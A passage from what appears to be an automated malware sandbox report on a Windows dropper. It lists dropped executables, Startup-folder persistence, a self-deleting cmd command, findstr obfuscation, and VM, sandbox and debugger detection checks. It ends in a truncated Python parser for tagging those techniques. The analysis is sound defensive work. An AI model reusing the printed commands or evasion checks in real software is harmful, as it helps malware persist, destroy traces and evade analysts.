Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004174B6 push ecx; ret 0_2_004174C9
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0043768D push esi; ret 0_2_00437696
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E7049 push ecx; ret 13_2_004E705C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 10_2_00406328
PE file contains sections with non-standard names
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name:
Source: parted.exe.10.dr Static PE information: section name: .themida
Source: parted.exe.10.dr Static PE information: section name: .boot
Source: acppage.dll.10.dr Static PE information: section name: .orpc
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name:
Source: IntelRapid.exe.15.dr Static PE information: section name: .themida
Source: IntelRapid.exe.15.dr Static PE information: section name: .boot
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: wheezy.exe.10.dr Static PE information: real checksum: 0xe94bb should be: 0xe5407
Source: lv[1].exe.0.dr Static PE information: real checksum: 0x0 should be: 0x450fee
Source: UAC.dll.10.dr Static PE information: real checksum: 0x0 should be: 0xde12
Source: File.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x450fee
Source: initial sample Static PE information: section name: entropy: 7.97590031918
Source: initial sample Static PE information: section name: entropy: 7.97590031918

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\acppage.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Jump to dropped file
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Local\Temp\File.exe Jump to dropped file
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\adprovider.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler\olader\acledit.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe File created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW, 0_2_0040E340
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E2A51 CompareStringA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,LocalAlloc,GetFileAttributesA, 13_2_004E2A51

Boot Survival:

Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\File.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000 Thread sleep count: 46 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344 Thread sleep time: -160000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 1480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files Jump to behavior
Source: IntelRapid.exe, 0000001D.00000002.365761146.000001E574EA8000.00000004.00000020.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: Bisogna.exe.com, 00000018.00000002.584887788.0000000003828000.00000004.00000001.sdmp Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW.48.ID
Source: IntelRapid.exe, 0000001A.00000002.339502137.000001B5F8B47000.00000004.00000020.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__m
Source: Bisogna.exe.com, 00000015.00000003.343298124.0000000001913000.00000004.00000001.sdmp Binary or memory string: l $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000015.00000002.356329862.000000000452E000.00000004.00000001.sdmp Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW
Source: Bisogna.exe.com, 00000015.00000003.346272795.00000000018F8000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, l.19.dr Binary or memory string: Local $dpjdrFdkImGxcUs = 'YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW'
Source: Bisogna.exe.com, 00000018.00000002.586020257.00000000039DE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: l.19.dr Binary or memory string: Local $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000018.00000002.584960509.000000000384E000.00000004.00000001.sdmp Binary or memory string: cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW (
Source: Bisogna.exe.com, 00000015.00000002.355832270.000000000191C000.00000004.00000001.sdmp Binary or memory string: gZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW, 0_2_0040E340
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose, 0_2_004026C0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042B3BE FindFirstFileExW, 0_2_0042B3BE
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406301 FindFirstFileW,FindClose, 10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 10_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 13_2_004E23D4
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread information set: HideFromDebugger
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 10_2_00406328
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042B021 mov eax, dword ptr fs:[00000030h] 0_2_0042B021
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004238B1 mov eax, dword ptr fs:[00000030h] 0_2_004238B1
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0308092B mov eax, dword ptr fs:[00000030h] 0_2_0308092B
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_030AB271 mov eax, dword ptr fs:[00000030h] 0_2_030AB271
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417261
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042C86D GetProcessHeap, 0_2_0042C86D
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417261
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004173F7 SetUnhandledExceptionFilter, 0_2_004173F7
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041763D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041763D
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041D9DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D9DD
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E6ECF SetUnhandledExceptionFilter, 13_2_004E6ECF
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E6B2F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_004E6B2F
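The VM-detection evidence above (SystemBiosVersion / VideoBiosVersion and the DriverDesc of the display-adapter device class {4d36e968-e325-11ce-bfc1-08002be10318}, the ACPI\DSDT\VBOX__ and VMware/Hyper-V strings, the Uninstall-key enumeration) and the anti-debugging evidence in this section (window-class probes for Process Monitor, Filemon and Regmon, ThreadHideFromDebugger, ProcessDebugPort / ProcessDebugObjectHandle queries, PEB reads through fs:[30h]) are the raw material for a per-process evasion summary. The Python below is an added example written for this page; it is neither Joe Sandbox code nor code recovered from the sample. It parses lines in the report's own "Source: <image> <event>: <detail>" layout and tags each process with the technique families it exhibits. The sample lines are copied from this report. The long-sleep threshold follows the report's ">= 3 min" signature and assumes the delay is logged in milliseconds; the logged value 922337203685477 is (2^63-1) // 10^4, which is consistent with the largest 64-bit relative wait in 100 ns units, so that thread is never meant to wake up.

```python
import re
from collections import defaultdict

# Constructed sample: evidence lines copied from the behaviour log above, in the
# report's own "Source: <image> <event>: <detail>" layout.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc",
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion",
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com",
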